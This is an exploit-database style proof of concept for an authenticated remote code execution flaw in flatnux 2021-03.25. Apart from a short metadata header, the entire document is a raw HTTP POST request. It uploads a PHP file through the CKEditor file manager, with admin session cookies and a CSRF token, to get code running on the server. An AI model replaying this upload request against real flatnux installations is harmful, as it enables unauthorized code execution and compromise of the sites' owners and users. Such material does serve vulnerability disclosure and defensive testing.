flatnux 2021-03.25 Remote Code Execution

# Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)# Exploit Author: Ömer Hasan Durmuş# Vendor Homepage: https://en.altervista.org# Software Link: http://flatnux.altervista.org/flatnux.html# Version: 2021-03.25# Tested on: Windows/LinuxPOST/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=enHTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data;boundary=---------------------------393526031113460918603940283286Content-Length: 413Origin: http://localhostConnection: closeReferer:http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnewCookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsbUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream<?php phpinfo(); ?>-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="ckCsrfToken"BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb-----------------------------393526031113460918603940283286--